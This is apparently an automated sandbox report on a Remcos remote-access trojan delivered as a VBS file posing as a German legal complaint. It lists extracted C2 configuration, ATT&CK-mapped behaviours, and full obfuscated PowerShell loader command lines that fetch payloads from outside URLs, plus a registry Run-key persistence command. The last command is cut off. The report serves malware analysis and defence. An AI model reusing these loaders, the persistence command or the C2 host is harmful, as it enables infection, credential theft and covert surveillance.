remcos | 5700a6ed9522d53708f6e93c1303b25bcd9ede837dc6a5c62f929db1a8d4a59c

Analysis

max time kernel
298s
max time network
287s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08/10/2024, 15:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08102024_1541_Beschwerde-Rechtsanwalt.vbs
Size

11KB
MD5

a7f87588bc5a6ad03f79fa3085be9d28
SHA1

c79dd84cd67b0846050b112ab4ce4b8c2f70794d
SHA256

5700a6ed9522d53708f6e93c1303b25bcd9ede837dc6a5c62f929db1a8d4a59c
SHA512

00dfd74685a88acb05970cfed07e5edbb605419f1ca4d8c0703ecb5dd436ef8b729c25bc5316e188d80c762a2f5b4a68a4b61b4dea8d7f1a50f477e76695bd21
SSDEEP

192:RXVmQSH8ZNUYCxEXHnas8BK1gF8ylvACz74VT4DNIO+LtbA/ziLrRtEpDCBMjd/8:11SIxC+X91gZ/+pwz3wb

Score

10^/10

remcos peewe8646 collection discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

PeeWe8646

www.autoshausamsachsenwald.de:6698

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Weepee83472-FSSJ2L
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/388-66-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/1616-75-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/2824-73-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/2824-73-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/388-66-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 11 IoCs

flow	pid	Process
2	3856	WScript.exe
6	3212	powershell.exe
18	1424	powershell.exe
20	1424	powershell.exe
24	1424	powershell.exe
27	1424	powershell.exe
28	1424	powershell.exe
29	1424	powershell.exe
30	1424	powershell.exe
42	752	powershell.exe
43	1924	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1924	powershell.exe
3024	powershell.exe
4832	powershell.exe
752	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\opkrves = "%Formicarium% -windowstyle 1 $Asminderd14=(gp -Path 'HKCU:\\Software\\Velvillig\\').Glunimie;%Formicarium% ($Asminderd14)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1424	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1424	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1424 set thread context of 388	1424	powershell.exe	103
PID 1424 set thread context of 2824	1424	powershell.exe	105
PID 1424 set thread context of 1616	1424	powershell.exe	106

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4544	reg.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
3212	powershell.exe
3212	powershell.exe
1424	powershell.exe
1424	powershell.exe
1424	powershell.exe
388	powershell.exe
388	powershell.exe
1616	powershell.exe
1616	powershell.exe
752	powershell.exe
1924	powershell.exe
388	powershell.exe
388	powershell.exe
752	powershell.exe
1924	powershell.exe
2736	powershell.exe
2736	powershell.exe
3024	powershell.exe
3024	powershell.exe
3336	powershell.exe
3336	powershell.exe
4832	powershell.exe
4832	powershell.exe
3336	powershell.exe
4832	powershell.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1424	powershell.exe
1424	powershell.exe
1424	powershell.exe
1424	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	3336	powershell.exe
Token: SeDebugPrivilege	4832	powershell.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 3856 wrote to memory of 3212	3856	WScript.exe	82
PID 3856 wrote to memory of 3212	3856	WScript.exe	82
PID 1424 wrote to memory of 1272	1424	powershell.exe	92
PID 1424 wrote to memory of 1272	1424	powershell.exe	92
PID 1424 wrote to memory of 1272	1424	powershell.exe	92
PID 1272 wrote to memory of 4544	1272	cmd.exe	95
PID 1272 wrote to memory of 4544	1272	cmd.exe	95
PID 1272 wrote to memory of 4544	1272	cmd.exe	95
PID 1424 wrote to memory of 2972	1424	powershell.exe	97
PID 1424 wrote to memory of 2972	1424	powershell.exe	97
PID 1424 wrote to memory of 2972	1424	powershell.exe	97
PID 1424 wrote to memory of 1344	1424	powershell.exe	99
PID 1424 wrote to memory of 1344	1424	powershell.exe	99
PID 1424 wrote to memory of 1344	1424	powershell.exe	99
PID 2972 wrote to memory of 752	2972	cmd.exe	100
PID 2972 wrote to memory of 752	2972	cmd.exe	100
PID 2972 wrote to memory of 752	2972	cmd.exe	100
PID 1424 wrote to memory of 388	1424	powershell.exe	103
PID 1424 wrote to memory of 388	1424	powershell.exe	103
PID 1424 wrote to memory of 388	1424	powershell.exe	103
PID 1424 wrote to memory of 388	1424	powershell.exe	103
PID 1424 wrote to memory of 3984	1424	powershell.exe	104
PID 1424 wrote to memory of 3984	1424	powershell.exe	104
PID 1424 wrote to memory of 3984	1424	powershell.exe	104
PID 1424 wrote to memory of 2824	1424	powershell.exe	105
PID 1424 wrote to memory of 2824	1424	powershell.exe	105
PID 1424 wrote to memory of 2824	1424	powershell.exe	105
PID 1424 wrote to memory of 2824	1424	powershell.exe	105
PID 1424 wrote to memory of 1616	1424	powershell.exe	106
PID 1424 wrote to memory of 1616	1424	powershell.exe	106
PID 1424 wrote to memory of 1616	1424	powershell.exe	106
PID 1424 wrote to memory of 1616	1424	powershell.exe	106
PID 1344 wrote to memory of 1924	1344	WScript.exe	107
PID 1344 wrote to memory of 1924	1344	WScript.exe	107
PID 1344 wrote to memory of 1924	1344	WScript.exe	107

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\08102024_1541_Beschwerde-Rechtsanwalt.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frigrelsens Unomnisciently Uninnocent Abaxial Incorporates Lycopin Tanda #>;$Misanthrope='Foyerernes';<#Bratticer Kalispel Supercapable Frembringelsernes Determinate #>;$Prayer=$host.PrivateData;If ($Prayer) {$cantino++;}function forladelsens($Envisagement213){$Spurveungen=$Langtidsindstillede+$Envisagement213.Length-$cantino;for( $Ligfrd86=2;$Ligfrd86 -lt $Spurveungen;$Ligfrd86+=3){$Dusts='Systematisk';$Fenestella+=$Envisagement213[$Ligfrd86];}$Fenestella;}function Tvangsapparat($Varyler){ & ($Hedas) ($Varyler);}$Awellimiden127=forladelsens 'geMAsoBrzPaiM,lB.lFuaTr/Ko5 D. S0Sc Af( W riMen ed.hoEnwAtsAm ExN TT T No1.e0 M. 0re; e FrWThi Bn 6St4Hy;.l FixUd6Pr4B ;ti .rudvSe:Bu1 e2De1,o.L,0Hj) D AkGAre ocU k,poK /Su2Eu0Nr1An0Gr0H,1 D0T 1.p BlFEli arAteSuf poEuxK,/ a1Be2 1La.K 0Ro ';$Landboreforms=forladelsens 'A uReSA EB rRe-I aI gSieOpnR t P ';$Cuticula=forladelsens 'Boh.utF,tElp.tsid:Me/st/tawN,w Rw R.K a uAbt oPrhGga .u sUn-Frc SnS .mad leEt/G oEllXedCh/ amAroAnbNaiGoli e i/ BP,drSie.ve nV sUn. FaFyaSmfCa ';$Ludder=forladelsens ' L>I ';$Hedas=forladelsens ',pISeeBixF ';$Underbegrebhs='Frags';$Haglbsserne='\Refleksbevgelsen.Owl';Tvangsapparat (forladelsens ' S$ Sg ol To.rbTaa olSk: lN me Nd SsF v BlKng feCerOn=En$TreEnnBevPa: ma RpRapSmdFoaHyt Va K+M $OmH uaFogDulB,b Hs es.ieGarDyn e ');Tvangsapparat (forladelsens 'Ic$TagDrl loKubGlaInlN,: SBB,rCre UpEniHanJudR.e UnGleKr=Ma$BiCSkuBet i ecBiuDilEka R. .sP p lCuiVatWa(Fr$KlL u Hd Bd KeAurSc) U ');Tvangsapparat (forladelsens 'Mu[D N BeGetPl. oSD.e,irRev Vi UcG eU.P o aiBanKat,eMJaaInn.aaPrg NeK r .] o: r:KbS eancTeuBjrIniRutKvy.ePDirPio FtXio cUno ClBo Tr= F Qu[WiN,peIltCh.SeSHye mcReuG r DiKotMyyFuPSkrCooNetTioSkc MoMyl MTBey.rp CeUn]il: :HaTA.l asO 1V 2P ');$Cuticula=$Brepindene[0];$oophorectomy=(forladelsens 'ho$UnG fLShoFlb GAFoL,t:s.G oe nOoi pNF d OKAfAJdl DdCuE e=NeNFoe iW -,uOPyBBrJ EKvCB,TAl ,rS,tY Cs PtCee M ,. Onbee,xtB .Ovw ePlbAkCBalOpi AElenSyTHy ');Tvangsapparat ($oophorectomy);Tvangsapparat (forladelsens 'O $ GPoemenAriHonildGakTraT l NdT.eta.GrHfie,taPodMae UrPosSt[Fe$VrLE aGan vdTebReo Cr,eeSpf ,o nrG,mU,sG.]S =hv$LeAThwSmePllPllini.am uiMidbee GnYd1Sa2re7Em ');$Astipulation=forladelsens 'Re$ UGUieThnTeiUnn edS.kUnaEdl edV.e A.GeDTro wB nH.lEpo MaHodTrFDaiDalVieOr(Vi$InCSkuOrt .isyc DuS l Sa,t, O$NaSIck.iiFln kn e,drLan.eeYo)Sy ';$Skinnerne=$Nedsvlger;Tvangsapparat (forladelsens 'e $,igA lG OVlB A bl ,:SuO TVPoetoR ONbieFeaWiTfo= p(C TCrEHes PTTj- IpLiA LtEgH o Ka$OcsBhK I kNClNB,e HrVanBaeBe)F, ');while (!$Overneat) {Tvangsapparat (forladelsens 'Dr$Dog Alsoo FbHeaAul.e:MoR,oe Ud MnSti anSigFas TkBuo UrAnp usSpe anAtepasRd= e$Dnt sr nuFoeCh ') ;Tvangsapparat $Astipulation;Tvangsapparat (forladelsens '.yST,tDraprrFatS.- AS ldievaeRupSe A4A ');Tvangsapparat (forladelsens 'Op$R gAxlBeoPabEla Ulin: SOK vBreC rdinT eBoavatka=Hi(FaTF,ekesDrt i-AnPU aAntMahba Fr$LiSmokP.i n RnRee,ir rnbae ) B ') ;Tvangsapparat (forladelsens 'Sc$ ,gHil.eo.hburaLnl C: ILTeeU t hmBae itSaaFul l Serer osDu=Vi$PigSll ao Lb a l,a: TOBem NkKal ,aL.sCosPhiGofP,iNicSveGrrIliEpnSug AeBerN,sDe+Su+,o%Ad$A.BS,rCleExp niU,n GdSteOsnEbe a.LecDyo Ru mn.etS ') ;$Cuticula=$Brepindene[$Letmetallers];}$Filmundergrund60=350404;$Rysteturenes=28134;Tvangsapparat (forladelsens 'W $O gC.lFoo ib.yaoblk : SS UkBioSnv,asIn2 U7 l U =.r ,rGcoe AtFj-,vCA o onCetSke nBrt p Gr$ kSCokPoiThn Zn,ae ArElnF,eCa ');Tvangsapparat (forladelsens 'Va$KugKalOvoD bT aRelU : aJ ,u arPe K=Av B [S SSty FsLotlie.emU,. rCafoPonD vSpeElrGetUn]Em:to:SuFd rEvo SmSiBCoaNasP.eAf6 O4hjSAptB r iM nPag N(Un$ZiSE kVio vT.sHu2Sn7 C)Pa ');Tvangsapparat (forladelsens 'A $F.gmolProG.bG.aLal f:SeC h ou nfTrfByiImeD,rBi Hj=Su .l[AcSM.yeksY,t veOpm T.PyT,ee Rx ct T.VoEt,nToc.no dCli Gn rgme]Pa:Ha:,bA KSI CNoIGaIRh.RiGMeeTrt KSAntSkrEgiK nPig C(Bo$OuJ uStrAd)P, ');Tvangsapparat (forladelsens 'Sm$Beg alH,oKnbDuaHel U:FeL UeAmg,ri kssklAna tByoExr F1 h5,r3Do= b$EkCHehCeuU fN fExiUneForFr.R.sTruPab.isDetSir eitin.igRi(K $ LFSiiSal .mTeu .nPrdCoeEfrBrgTyrBeu Fn dEu6Ap0 ,Fo$UdRFoy bs ot ,eF t UuCorS eUnndae Ss o),r ');Tvangsapparat $Legislator153;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Frigrelsens Unomnisciently Uninnocent Abaxial Incorporates Lycopin Tanda #>;$Misanthrope='Foyerernes';<#Bratticer Kalispel Supercapable Frembringelsernes Determinate #>;$Prayer=$host.PrivateData;If ($Prayer) {$cantino++;}function forladelsens($Envisagement213){$Spurveungen=$Langtidsindstillede+$Envisagement213.Length-$cantino;for( $Ligfrd86=2;$Ligfrd86 -lt $Spurveungen;$Ligfrd86+=3){$Dusts='Systematisk';$Fenestella+=$Envisagement213[$Ligfrd86];}$Fenestella;}function Tvangsapparat($Varyler){ & ($Hedas) ($Varyler);}$Awellimiden127=forladelsens 'geMAsoBrzPaiM,lB.lFuaTr/Ko5 D. S0Sc Af( W riMen ed.hoEnwAtsAm ExN TT T No1.e0 M. 0re; e FrWThi Bn 6St4Hy;.l FixUd6Pr4B ;ti .rudvSe:Bu1 e2De1,o.L,0Hj) D AkGAre ocU k,poK /Su2Eu0Nr1An0Gr0H,1 D0T 1.p BlFEli arAteSuf poEuxK,/ a1Be2 1La.K 0Ro ';$Landboreforms=forladelsens 'A uReSA EB rRe-I aI gSieOpnR t P ';$Cuticula=forladelsens 'Boh.utF,tElp.tsid:Me/st/tawN,w Rw R.K a uAbt oPrhGga .u sUn-Frc SnS .mad leEt/G oEllXedCh/ amAroAnbNaiGoli e i/ BP,drSie.ve nV sUn. FaFyaSmfCa ';$Ludder=forladelsens ' L>I ';$Hedas=forladelsens ',pISeeBixF ';$Underbegrebhs='Frags';$Haglbsserne='\Refleksbevgelsen.Owl';Tvangsapparat (forladelsens ' S$ Sg ol To.rbTaa olSk: lN me Nd SsF v BlKng feCerOn=En$TreEnnBevPa: ma RpRapSmdFoaHyt Va K+M $OmH uaFogDulB,b Hs es.ieGarDyn e ');Tvangsapparat (forladelsens 'Ic$TagDrl loKubGlaInlN,: SBB,rCre UpEniHanJudR.e UnGleKr=Ma$BiCSkuBet i ecBiuDilEka R. .sP p lCuiVatWa(Fr$KlL u Hd Bd KeAurSc) U ');Tvangsapparat (forladelsens 'Mu[D N BeGetPl. oSD.e,irRev Vi UcG eU.P o aiBanKat,eMJaaInn.aaPrg NeK r .] o: r:KbS eancTeuBjrIniRutKvy.ePDirPio FtXio cUno ClBo Tr= F Qu[WiN,peIltCh.SeSHye mcReuG r DiKotMyyFuPSkrCooNetTioSkc MoMyl MTBey.rp CeUn]il: :HaTA.l asO 1V 2P ');$Cuticula=$Brepindene[0];$oophorectomy=(forladelsens 'ho$UnG fLShoFlb GAFoL,t:s.G oe nOoi pNF d OKAfAJdl DdCuE e=NeNFoe iW -,uOPyBBrJ EKvCB,TAl ,rS,tY Cs PtCee M ,. Onbee,xtB .Ovw ePlbAkCBalOpi AElenSyTHy ');Tvangsapparat ($oophorectomy);Tvangsapparat (forladelsens 'O $ GPoemenAriHonildGakTraT l NdT.eta.GrHfie,taPodMae UrPosSt[Fe$VrLE aGan vdTebReo Cr,eeSpf ,o nrG,mU,sG.]S =hv$LeAThwSmePllPllini.am uiMidbee GnYd1Sa2re7Em ');$Astipulation=forladelsens 'Re$ UGUieThnTeiUnn edS.kUnaEdl edV.e A.GeDTro wB nH.lEpo MaHodTrFDaiDalVieOr(Vi$InCSkuOrt .isyc DuS l Sa,t, O$NaSIck.iiFln kn e,drLan.eeYo)Sy ';$Skinnerne=$Nedsvlger;Tvangsapparat (forladelsens 'e $,igA lG OVlB A bl ,:SuO TVPoetoR ONbieFeaWiTfo= p(C TCrEHes PTTj- IpLiA LtEgH o Ka$OcsBhK I kNClNB,e HrVanBaeBe)F, ');while (!$Overneat) {Tvangsapparat (forladelsens 'Dr$Dog Alsoo FbHeaAul.e:MoR,oe Ud MnSti anSigFas TkBuo UrAnp usSpe anAtepasRd= e$Dnt sr nuFoeCh ') ;Tvangsapparat $Astipulation;Tvangsapparat (forladelsens '.yST,tDraprrFatS.- AS ldievaeRupSe A4A ');Tvangsapparat (forladelsens 'Op$R gAxlBeoPabEla Ulin: SOK vBreC rdinT eBoavatka=Hi(FaTF,ekesDrt i-AnPU aAntMahba Fr$LiSmokP.i n RnRee,ir rnbae ) B ') ;Tvangsapparat (forladelsens 'Sc$ ,gHil.eo.hburaLnl C: ILTeeU t hmBae itSaaFul l Serer osDu=Vi$PigSll ao Lb a l,a: TOBem NkKal ,aL.sCosPhiGofP,iNicSveGrrIliEpnSug AeBerN,sDe+Su+,o%Ad$A.BS,rCleExp niU,n GdSteOsnEbe a.LecDyo Ru mn.etS ') ;$Cuticula=$Brepindene[$Letmetallers];}$Filmundergrund60=350404;$Rysteturenes=28134;Tvangsapparat (forladelsens 'W $O gC.lFoo ib.yaoblk : SS UkBioSnv,asIn2 U7 l U =.r ,rGcoe AtFj-,vCA o onCetSke nBrt p Gr$ kSCokPoiThn Zn,ae ArElnF,eCa ');Tvangsapparat (forladelsens 'Va$KugKalOvoD bT aRelU : aJ ,u arPe K=Av B [S SSty FsLotlie.emU,. rCafoPonD vSpeElrGetUn]Em:to:SuFd rEvo SmSiBCoaNasP.eAf6 O4hjSAptB r iM nPag N(Un$ZiSE kVio vT.sHu2Sn7 C)Pa ');Tvangsapparat (forladelsens 'A $F.gmolProG.bG.aLal f:SeC h ou nfTrfByiImeD,rBi Hj=Su .l[AcSM.yeksY,t veOpm T.PyT,ee Rx ct T.VoEt,nToc.no dCli Gn rgme]Pa:Ha:,bA KSI CNoIGaIRh.RiGMeeTrt KSAntSkrEgiK nPig C(Bo$OuJ uStrAd)P, ');Tvangsapparat (forladelsens 'Sm$Beg alH,oKnbDuaHel U:FeL UeAmg,ri kssklAna tByoExr F1 h5,r3Do= b$EkCHehCeuU fN fExiUneForFr.R.sTruPab.isDetSir eitin.igRi(K $ LFSiiSal .mTeu .nPrdCoeEfrBrgTyrBeu Fn dEu6Ap0 ,Fo$UdRFoy bs ot ,eF t UuCorS eUnndae Ss o),r ');Tvangsapparat $Legislator153;"
1⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1424
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "opkrves" /t REG_EXPAND_SZ /d "%Formicarium% -windowstyle 1 $Asminderd14=(gp -Path 'HKCU:\Software\Velvillig\').Glunimie;%Formicarium% ($Asminderd14)"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1272
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "opkrves" /t REG_EXPAND_SZ /d "%Formicarium% -windowstyle 1 $Asminderd14=(gp -Path 'HKCU:\Software\Velvillig\').Glunimie;%Formicarium% ($Asminderd14)"
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Bedstevennens.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -windowstyle hidden "<#Surtouts Metalkiste Folium #>;$Opholdte231='Zenography';<#Anstand Misvouched Modelled Otmar Riffelgang #>;$Tilvristes=$Scrimshanker23+$host.UI;If ($Tilvristes) {$Rommy212++;}function Nonreceptively($lndstatistikkens){$Forringelsens212=$Tommestokkene+$lndstatistikkens.Length-$Rommy212; for( $Hjaelpefunktion242=2;$Hjaelpefunktion242 -lt $Forringelsens212;$Hjaelpefunktion242+=3){$Kller='Murmuringly222';$Partshringen+=$lndstatistikkens[$Hjaelpefunktion242];$pisachi='Turnering';}$Partshringen;}function Sekundovioliners162($Cardionosus){ . ($Prevented) ($Cardionosus);}$Nonscrutiny=Nonreceptively ' BMGro zSui .ltelVras /Co5Da.Fr0My .r( SWAsiOvn AdVaoSyw sCa kNDeT S 1Un0 . ,0 r;pa edWBaiB nCh6.o4Be;O .ex D6R 4De;R GrrB v v: F1 P2G 1Th. P0Li)Kl FoGObe.ic.akDeoS./ha2Ln0E 1 F0Su0 e1Nr0Un1 TrFBei lr SeInfScoLux.u/St1Ed2St1Tr.Ne0Ka ';$Afretters=Nonreceptively ' uUAms SeFirSh- Ta tGGre RN TUl ';$Noration252=Nonreceptively 'Smh KtBrtT pKosPr:No/Sa/ cw Rw hwE .RefIna HsK,thoa Fn sk EaU uMifC . IdHue /MoG Da pjSa.Dil,upP.k B ';$Densitometre=Nonreceptively 'Fa> R ';$Prevented=Nonreceptively 'leIEkEDexCr ';$Krigssituationens='Mngderabats';$Cadillo='\Alkyds.jen';Sekundovioliners162 (Nonreceptively 'Sl$ G .lIdO.nbMiAF,LSt:,ybskLTea ,rUni ,nAfaSe= o$ aeCen ,vLi:T a FpP P ud aChtGuASt+So$ hcPea.ads.i ilB LReO.i ');Sekundovioliners162 (Nonreceptively 'L $BeGTilBioMaBC,a LS.:.eAEvUSlt,uoOnPPahProF,TPro TMNaE CtUnR pySa=Op$ Pn .omarNyAAstapi aobonMa2K,5St2A..udSUnp ,L MIVat n(Ta$ BdFreeunfjsPri.etH,OJamH.EentUdRH ede) E ');Sekundovioliners162 (Nonreceptively 'Cy[RenR,EP,tTi. es TeInRFovPaIP c tE DPSto uISlnIdTYeMG a nN AShg e lRLa]op:Br: sBuE DCUnuR r iInTSeYefPRurBoOStTBeOggCUrOt l . =Do Et[Fen ReSat ,.FisAlE nCHeuSkrGaiCiT Ybup rNgo,jTFrOEkc hO aL tb y pN.ePr]Fl:an: iTReLe S C1Gu2Fr ');$Noration252=$autophotometry[0];$Terebrate=(Nonreceptively ' K$TeGFolK.o,lB .a,eLDe:PrFEnu hN.iA PM DBTeUSvL SAN TLaIC NRoG B=ViNhyEFlW a-faoFib .jbrEGuc TAr S s aYAsS,ntC,EInm T.BaNFlEBit.t.StWPoe AbkuC bL TiCieD NKotDe ');Sekundovioliners162 ($Terebrate);Sekundovioliners162 (Nonreceptively ' U$ lF Su mnToaOumBobGruMul KaPrtmoiRen CgEv.T HBle aArdIce Vr.ms O[ M$P,A IfT.r neCatIntE,eF.r,rs,n]Re=Sy$BeNFooP nTvs icdrrGauFot SiSonH yPr ');$Craniopuncture=Nonreceptively 'sk$ nF MuR nN,a tmMebAfu SlCoaUdtVei nUsgBr. MDChoT w,enSal oo yanudTrFPri VlO.eU.( ,$ ENBooCorUna,otA,iOvo WnFo2B 5S 2C,, $,kP ohFeoOpn yeUnmSueF sSt)G. ';$Phonemes=$Blarina;Sekundovioliners162 (Nonreceptively ' u$,nGOvLFoO bTiA AL H:Raf dRBaiC MR,RS KHoeSkH a TnSmD aLdaEWarO nAcE s .2 a4 A3Ha=,e(,oTa eBlSS,TEx- Pp CAMutSoh.i Re$ CpGuH CoOdNBoE umSyEOus )Md ');while (!$Frimrkehandlernes243) {Sekundovioliners162 (Nonreceptively ' i$FigSklBaoOub,raSylEd: .U dKadPreG lCei HgB,e Rs.e=.i$P tV r LuKue H ') ;Sekundovioliners162 $Craniopuncture;Sekundovioliners162 (Nonreceptively ' s MtUnABoRDeTT.-haSn,L ,e EOvPSi Re4Ni ');Sekundovioliners162 (Nonreceptively 'ex$JuGcaLStO AbDiaC,lgr:M F,irs I PMQ,RB KBeEK h AFonSkd ,Lpre mRTrN iEF.sCo2Ru4We3A = P(FrT eBaS Ct C- rp .A TQuH S Mi$E PSnhS OCrn,ae dMSieDesCh) ') ;Sekundovioliners162 (Nonreceptively 'C,$AuGArlr o SBPra,elRu:UnIRoNSitFoeSaRTeb .RAie taStT FhD =Ha$CoGTulBoONabFoA.llGa: d Se.onDaa eT uLir aETrr iJuN TG uSInMBlIPsdC LF EAnt SI,+Un+ P%S.$GoaRauUfTMuoSlpMehNaO iTCoO Rm .ESntQurD y e. Dc eoAiu oN.aTD. ') ;$Noration252=$autophotometry[$Interbreath];}$Superieure=333021;$Unmeet=29044;Sekundovioliners162 (Nonreceptively 'Ma$DeGEfl pO rb.rA lu.: GYtaChrFoD oEKoRF.KMoafaSN EWrRI,n GE .R P Af= L FlG lEimTUn-KrCWaoClNEnTM e iNBat.u Im$P pOph o .nAlEOvm NeDos,f ');Sekundovioliners162 (Nonreceptively 'P $S,gMal.voglbs.asulAn:H BS uFonAndBeb .r It Ps.n Or= O G.[ rS AyhesDrtPye,omV,.S,C Eo JnDev IeA rDitSa] a:Wa:whFCurCyoMamBlBWaa KsAueKl6 ,4 lS it Gr i GnmegTv(,t$D GAna Tr.mdCaeS rGlkTiaAfs ueCorBun.oe.arC.)be ');Sekundovioliners162 (Nonreceptively 'Ch$SuGT LCaOExB .aUdlDa:IwY dUdeHurDel I.og gRea AGie anHed.eEBlS.e =So Da[KvsLoYG sKitUnEC mSt.PatpiEc,x iTS .jue,eNmactjOMoDKoiOun cGd ]En:P.:xaATosHec eIK,iRe. DG ,eHat .S et BrH,iS.NAkgCh(U $PoBTuuL nF df BGirNaTIlsSi)Bi ');Sekundovioliners162 (Nonreceptively 'Si$ SgFelM.O iBOmaTalP :Idm,ea,uGBinLuISpSN.7.i4An=Ov$Joy d.neanR eL rIHogn gOua oAEfE,inl dp.E FS .GosCou SBMoSEnTUdr iCon.igRe(Fa$Dos SUI pS.E,ar 